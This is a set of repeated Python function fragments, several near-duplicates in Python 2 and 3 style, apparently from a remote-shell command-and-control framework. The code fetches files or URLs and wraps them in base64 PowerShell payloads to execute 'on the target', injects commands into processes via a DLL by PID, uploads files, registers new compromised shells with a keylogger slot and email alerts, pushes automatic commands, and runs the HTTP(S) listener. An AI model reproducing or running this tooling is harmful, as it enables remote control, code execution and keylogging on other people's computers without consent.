def exec_code(self, data): try: cmd, path = data.split(" ", 1) except: UI.error("Missing arguments") return "" data = ";" path = self.alias.get_alias(path) if Utils.file_exists(path, False, False): data = Utils.load_file_unsafe(path) else: data = Utils.download_url(path) if not data == ";": UI.success("Fetching %s" % path) data = base64.b64encode(data) ps = Utils.load_powershell_script("exec.ps1", 12) ps = Utils.update_key(ps, "PAYLOAD", data) UI.success("Payload should be executed shortly on the target") return ps else: UI.error("Cannot fetch the resource") return data
def start_httpd(config): ip = config.get('http-host') try: port = int(config.get('http-port')) except: UI.error("(http-port) HTTP port need to be a integer.", True) print '\r\n' UI.success('Starting web server on %s port %d' % (ip, port)) try: server_class = BaseHTTPServer.HTTPServer factory = HTTPDFactory(config) httpd_server = server_class((ip, port), factory) if config.get('https-enabled') == 'on': cert = config.get('https-cert-path') Utils.file_exists(cert, True) httpd_server.socket = ssl.wrap_socket(httpd_server.socket, certfile=cert) UI.success('Web server is using HTTPS') httpd_server.serve_forever() except: UI.error( 'Server was not able to start (Port already in use?)... Aborting', True)
def inject(self, data): archs = ["32", "64"] try: option, arch, pid, cmd = data.split(" ", 3) except: UI.error("Missing arguments") return "" if len(cmd) > 4096: UI.error("Your command is bigger than 4096 bytes") return "" if not arch in archs: UI.error("Invalid architecture provided (32/64)") return "" dll = Utils.load_file("bin/inject-%s.dll" % arch) dll = dll.replace("A" * 4096, cmd + "\x00" * (4096 - len(cmd))) ps = Utils.load_powershell_script("injector.ps1", 1) ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(dll)) ps = Utils.update_key(ps, "PID", pid) UI.success("Injecting %s" % cmd) UI.success("Into %s bits process with PID %s" % (arch, pid)) return ps
def upload_file(self, data): try: cmd, path, remote = data.split(" ", 2) except: UI.error("Missing arguments") return "" data = ";" path = self.alias.get_alias(path) if Utils.file_exists(path, False, False): data = Utils.load_file_unsafe(path) else: data = Utils.download_url(path) if not data == ";": UI.success("Fetching %s" % path) data = base64.b64encode(data) ps = Utils.load_powershell_script("upload.ps1", 3) ps = Utils.update_key(ps, "PAYLOAD", data) ps = Utils.update_key(ps, "PATH", remote) UI.success("Payload will be saved at %s" % path) return ps else: UI.error("Cannot fetch the resource") return data
def exec_code(self, data): try: cmd, path = data.split(" ", 1) except: UI.error("Missing arguments") return "" data = ";" path = self.alias.get_alias(path) if Utils.file_exists(path, False, False): data = Utils.load_file_unsafe(path) else: data = Utils.download_url(path) if not data == ";": UI.success("Fetching %s" % path) data = base64.b64encode(data) ps = Utils.load_powershell_script("exec.ps1", 16) ps = Utils.update_key(ps, "PAYLOAD", data) UI.success("Payload should be executed shortly on the target") return ps else: UI.error("Cannot fetch the resource") return data
def register(self, guid, data): cmd, guid, prompt = data.split(" ", 2) self.db.set_prompt(guid, prompt) index = self.db.get_id(guid) print "" UI.success("Registering new shell %s" % prompt) UI.success("New shell ID %s GUID is %s" % (index, guid)) Log.log_event("New Shell", data)
def get_autocommands(self, guid): profile = self.config.get("profile") commands = profile.get("autocommands") if isinstance(commands, list): UI.success("Running auto commands on shell %s" % guid) for command in commands: print "[+] %s" % command self.db.push_cmd(guid, command, Utils.guid(), self.config.get("username"))
def set_alias(self, data): try: (cmd, key, value) = data.split(" ", 2) except: UI.error("Missing arguments") return "" self.alias.set_custom(key, value) UI.success("%s is now set to %s" % (key, value)) return ""
def set_alias(self, data): try: (cmd, key, value) = data.split(' ', 2) except: UI.error('Missing arguments') return '' self.alias.set_custom(key, value) UI.success('%s is now set to %s' % (key, value)) return ''
def get_cmd_send(self): guid = False for item in self.sql.get_cmd(self.config.get("uid")): print "" UI.success("[%s] Sending command: %s" % (item[4], self.sql.get_cmd_data(item[1]))) self.sql.delete_cmd(item[0], item[2], item[1], item[3]) guid = item[0] return guid
def get_cmd_send(self): guid = False for item in self.sql.get_cmd(self.config.get('uid')): print '' data = self.sql.get_cmd_data(item[1]) UI.success('%s - Sending command: %s' % (item[4], data)) self.sql.delete_cmd(item[0], item[2], item[1], item[3]) guid = item[0] if data == 'exit': guid = 'exit' return guid
def set_alias(self, data): try: cmd, key, value = data.split(" ", 2) except: UI.error("Missing arguments") return "" self.alias.set_custom(key, value) UI.success("%s is now set to %s" % (key, value)) return ""
def register(self, guid, data): cmd, guid, prompt = data.split(" ", 2) self.db.set_prompt(guid, prompt) index = self.db.get_id(guid) print "" UI.success("Registering new shell %s" % prompt) UI.success("New shell ID %s GUID is %s" % (index, guid)) Log.log_event("New Shell", data) self.get_autocommands(guid) if self.config.get("auto-interact") == "on": pass
def get_autocommands(self, guid): profile = self.config.get("profile") commands = profile.get("autocommands") if isinstance(commands, list): shell = self.db.get_prompt(guid).decode().split(" ")[1] UI.success("Running auto commands on shell %s" % shell) Log.log_event("Running auto commands on shell", shell) for command in commands: print("\t[+] %s" % command) Log.log_shell(guid, "Sending", command) self.db.append_shell_data(guid, "[%s] AutoCommand Sending: \n%s\n\n" % (Utils.timestamp(),command)) self.db.push_cmd(guid, command, Utils.guid(), self.config.get("username"))
def inject(self, data): try: (option, pid, cmd) = data.split(" ", 2) except: UI.error("Missing arguments") return "" ps = Utils.load_powershell_script("injector.ps1", 1) ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd)) ps = Utils.update_key(ps, "PID", pid) UI.success("Injecting %s" % cmd) UI.success("Into process with PID %s" % pid) return ps
def register(self, guid, data): (cmd, guid, prompt) = data.split(' ', 2) self.db.set_prompt(guid, prompt) index = self.db.get_id(guid) print '' UI.success('Registering new shell %s' % prompt) UI.success('New shell ID %s GUID is %s' % (index, guid)) self.db.set_key("%s:keylogger" % guid, "") Log.log_event('New Shell', data) self.get_autocommands(guid) if self.config.get('auto-interact') == 'on': pass
def inject(self, data): try: (option, pid, cmd) = data.split(' ', 2) except: UI.error('Missing arguments') return '' ps = Utils.load_powershell_script('injector.ps1', 1) ps = Utils.update_key(ps, 'PAYLOAD', base64.b64encode(cmd)) ps = Utils.update_key(ps, 'PID', pid) UI.success('Injecting %s' % cmd) UI.success('Into process with PID %s' % pid) return ps
def inject(self, data): try: option, pid, cmd = data.split(" ", 2) except: UI.error("Missing arguments") return "" ps = Utils.load_powershell_script("injector.ps1", 1) ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd)) ps = Utils.update_key(ps, "PID", pid) UI.success("Injecting %s" % cmd) UI.success("Into process with PID %s" % pid) return ps
def register(self, guid, data): if type(data) is not str: data = data.decode() (cmd, guid, prompt) = data.split(" ", 2) self.db.set_prompt(guid, prompt) index = self.db.get_id(guid).decode() print("") UI.success("Registering new shell %s" % prompt) UI.success("New shell ID %s GUID is %s" % (index, guid)) self.db.set_key("%s:keylogger" % guid, "") Log.log_event("New Shell", data) self.get_autocommands(guid) if self.config.get("auto-interact") == "on": pass
def get_autocommands(self, guid): profile = self.config.get('profile') commands = profile.get('autocommands') if isinstance(commands, list): UI.success('Running auto commands on shell %s' % guid) Log.log_event('Running auto commands on shell', guid) for command in commands: print '\t[+] %s' % command Log.log_shell(guid, 'Sending', command) self.db.append_shell_data( guid, "[%s] AutoCommand Sending: \n%s\n" % (Utils.timestamp(), command)) self.db.push_cmd(guid, command, Utils.guid(), self.config.get('username'))
def start_httpd(config): ip = config.get("http-host") port = int(config.get("http-port")) UI.success("Starting web server on %s port %d" % (ip, port)) server_class = BaseHTTPServer.HTTPServer factory = HTTPDFactory(config) httpd_server = server_class((ip, port), factory) if config.get("https-enabled") == "on": cert = config.get("https-cert-path") Utils.file_exists(cert, True) httpd_server.socket = ssl.wrap_socket(httpd_server.socket, certfile=cert) UI.success("Web server is using HTTPS") httpd_server.serve_forever()
def fetch(self, data): try: (cmd, path, ps) = data.split(' ', 2) except: UI.error('Missing arguments') return '' data = ';' path = self.alias.get_alias(path) if Utils.file_exists(path, False, False): data = Utils.load_file_unsafe(path) else: data = Utils.download_url(path) if not data == ';': UI.success('Fetching %s' % path) UI.success('Executing %s' % ps) return '%s;%s' % (data, ps) else: UI.error('Cannot fetch the resource') return ''
def fetch(self, data): try: (cmd, path, ps) = data.split(" ", 2) except: UI.error("Missing arguments") return "" data = ";" path = self.alias.get_alias(path) if Utils.file_exists(path, False, False): data = Utils.load_file_unsafe(path) else: data = Utils.download_url(path) if not data == ";": UI.success("Fetching %s" % path) UI.success("Executing %s" % ps) return "%s;%s" % (data, ps) else: UI.error("Cannot fetch the resource") return ""
def register(self, guid, data): if type(data) is not str: data = data.decode() (cmd, guid, prompt) = data.split(" ", 2) self.db.set_prompt(guid, prompt) index = self.db.get_id(guid).decode() print("") UI.success("Registering new shell %s" % prompt) UI.success("New shell ID %s GUID is %s" % (index, guid)) try: notify = EmailNotify(config) notify.send_notification("NEW SHELL callback: %s" % prompt) except: UI.error("Notification failed", False) self.db.set_key("%s:keylogger" % guid, "") Log.log_event("New Shell", data) self.get_autocommands(guid) if self.config.get("auto-interact") == "on": pass
def fetch(self, data): try: cmd, path, ps = data.split(" ", 2) except: UI.error("Missing arguments") return "" data = ";" path = self.alias.get_alias(path) if Utils.file_exists(path, False, False): data = Utils.load_file_unsafe(path) else: data = Utils.download_url(path) if not data == ";": UI.success("Fetching %s" % path) UI.success("Executing %s" % ps) return "%s;%s" % (data, ps) else: UI.error("Cannot fetch the resource") return ""
def exec_code(self, data): try: (cmd, path) = data.split(' ', 1) except: UI.error('Missing arguments') return '' data = ';' path = self.alias.get_alias(path) if Utils.file_exists(path, False, False): data = Utils.load_file_unsafe(path) else: data = Utils.download_url(path) if not data == ';': UI.success('Fetching %s' % path) data = base64.b64encode(data) ps = Utils.load_powershell_script('exec.ps1', 16) ps = Utils.update_key(ps, 'PAYLOAD', data) UI.success('Payload should be executed shortly on the target') return ps else: UI.error('Cannot fetch the resource') return data
def start_httpd(config): ip = config.get("http-host") try: port = int(config.get("http-port")) except: UI.error("(http-port) HTTP port need to be a integer.", True) UI.warn("Starting web server on %s port %d" % (ip, port)) try: server_class = http.server.HTTPServer factory = HTTPDFactory(config) httpd_server = server_class((ip, port), factory) if config.get("https-enabled") == "on": cert = config.get("https-cert-path") Utils.file_exists(cert, True) httpd_server.socket = ssl.wrap_socket(httpd_server.socket, certfile=cert) UI.success("Web server is using HTTPS") httpd_server.serve_forever() except Exception as e: print("%s, %s" % (sys.exc_info()[1],sys.exc_info()[2])) UI.error("Server was not able to start (Port already in use?)... Aborting", True)
def start_httpd(config): ip = config.get("http-host") port = int(config.get("http-port")) print "\r\n" UI.success("Starting web server on %s port %d" % (ip, port)) try: server_class = BaseHTTPServer.HTTPServer factory = HTTPDFactory(config) httpd_server = server_class((ip, port), factory) if config.get("https-enabled") == "on": cert = config.get("https-cert-path") Utils.file_exists(cert, True) httpd_server.socket = ssl.wrap_socket(httpd_server.socket, certfile=cert) UI.success("Web server is using HTTPS") httpd_server.serve_forever() except: UI.error( "Server was not able to start (Port already in use?)... Aborting", True)
def upload_file(self, data): try: (cmd, path, remote) = data.split(' ', 2) except: UI.error('Missing arguments') return '' data = ';' path = self.alias.get_alias(path) if Utils.file_exists(path, False, False): data = Utils.load_file_unsafe(path) else: data = Utils.download_url(path) if not data == ';': UI.success('Fetching %s' % path) data = base64.b64encode(data) ps = Utils.load_powershell_script('upload.ps1', 3) ps = Utils.update_key(ps, 'PAYLOAD', data) ps = Utils.update_key(ps, 'PATH', remote) UI.success('Payload will be saved at %s' % path) return ps else: UI.error('Cannot fetch the resource') return data
profile = CONFIG(profile) config.set("profile", profile) uid = Utils.guid() config.set("uid", uid) config.set("username", "(CLI)%s" % sys.argv[2]) db = RedisQuery(config) sql = MySQLQuery(config) sql.install_db().init_uid() config.set("redis", db) config.set("mysql", sql) db.update_config(config).init_sql() UI.success("Current Active session UUID is %s" % config.get("uid")) # Launch the HTTPD daemon if not "-nohttpd" in sys.argv: httpd_thread = init_httpd_thread(config) cli = Cli(config) while True: try: cmd = cli.prompt() cli.parse_cmd(cmd) except KeyboardInterrupt as e: UI.error("*** You really want to exit the application? *** (yes/no)") if UI.prompt("Exit").lower() == "yes":